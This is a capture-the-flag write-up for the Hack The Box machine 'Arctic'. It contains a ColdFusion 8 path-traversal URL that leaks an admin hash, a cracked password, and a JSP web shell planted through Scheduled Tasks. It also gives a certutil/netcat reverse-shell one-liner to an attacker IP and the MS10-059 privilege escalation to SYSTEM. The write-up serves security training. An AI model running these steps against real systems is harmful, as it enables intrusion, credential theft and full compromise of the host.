hackthebox – arctic – windows

Starting with nmap

# nmap 10.10.10.11
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-22 07:03 EDT
Nmap scan report for 10.10.10.11
Host is up (0.25s latency).
Not shown: 997 filtered ports
PORT      STATE SERVICE
135/tcp   open  msrpc
8500/tcp  open  fmtp
49154/tcp open  unknown

Only three ports are open. On browsing http://10.10.10.11:8500 , we see two directories. These two folders represent ColdFusion.

hackthebox – coldfusion

http://10.10.10.11:8500/CFIDE/administrator reveals following page:

hackthebox – coldfusion 8 administrator login page

Coldfusion 6-10 is vulnerable to LFI attack. From the above screenshot, we know we have CF version is 8. We will use the following as suggested here.

http://10.10.10.11/CFIDE/administrator/enter.cfm?locale=................\ColdFusion8\lib\password.properties%00e​n

hackthebox – coldfusion 8 LFI

From above we got

#Wed Mar 22 20:53:51 EET 2017 rdspassword=0IA/F[[E>[$_6& \\Q>[K\=XP \n password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03 encrypted=true

Cracking the hash with john quickly reveals the password is happyday

# john hash.txt

Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-AxCrypt"
Use the "--format=Raw-SHA1-AxCrypt" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-Linkedin"
Use the "--format=Raw-SHA1-Linkedin" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "ripemd-160"
Use the "--format=ripemd-160" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 32/32])
Warning: no OpenMP support for this hash type, consider --fork=2
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
happyday         (?)
1g 0:00:00:00 DONE 2/3 (2019-06-22 08:18) 1.960g/s 2850p/s 2850c/s 2850C/s happyday
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed

Now we can login as user admin and above password.

From left-hand side click on “Settings Summary”, you will see the full path of /CFIDE.

hackthebox – coldfusion 8 /CFIDE fullpath

Also from left-hand side we can click on “Scheduled Tasks” to download our payload and execute it.

hackthebox – arctic – upload jsp shell

Here main thing to keep in mind is that we need to setup http server and server cmdjsp.jsp which can be found in kali by default.

save by clicking on submit and run by clicking on green action button.

hackthebox – jsp shell

Our task will run and now the file has been saved in /CFIDE path we can execute it by clicking it.

hackthebox – shell

As we can see we can now run command and can do whatever we want. Lets get a shell.

Run following in the box.

certutil -urlcache -split -f http://10.10.14.7/nc.exe & nc.exe 10.10.14.7 1234 -e cmd.exe

Don’t forget to set the listener.

# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.11] 49838
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\ColdFusion8\runtime\bin>whoami
whoami
arctic\tolis

Run systeminfo command and save it to a file sysinfo.txt. Then run windows-exploit-suggester.py

# python windows-exploit-suggester.py --database 2019-06-09-mssb.xls --systeminfo ~/htb/artic/sysinfo.txt 
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*] 
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*] 
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done

We got few priv esac suggestion. Other didn’t work for me. Only MS10-059 worked. Download it from here.

Setup another listener.

# nc -lvnp 4444

Download the MS10-059 and run it.

C:\Users\tolis>certutil -urlcache -split -f http://10.10.14.7/ms10-059.exe ms10-059.exe

C:\Users\tolis>ms10-059.exe
ms10-059.exe
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Usage: Chimichurri.exe ipaddress port <BR>

C:\Users\tolis>ms10-059.exe 10.10.14.7 4444
ms10-059.exe 10.10.14.7 4444
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Changing registry values...<BR>/Chimichurri/-->Got SYSTEM token...<BR>/Chimichurri/-->Running reverse shell...<BR>/Chimichurri/-->Restoring default registry values...<BR>

We got a shell with high privilege.

# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.11] 49903
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\tolis>whoami
whoami
nt authority\system

We can now read the flags:

c:\> type c:\Users\tolis\Desktop\user.txt
c:\> type c:\Users\Administrator\Desktop\root.txt

Leave a Reply

Your email address will not be published. Required fields are marked *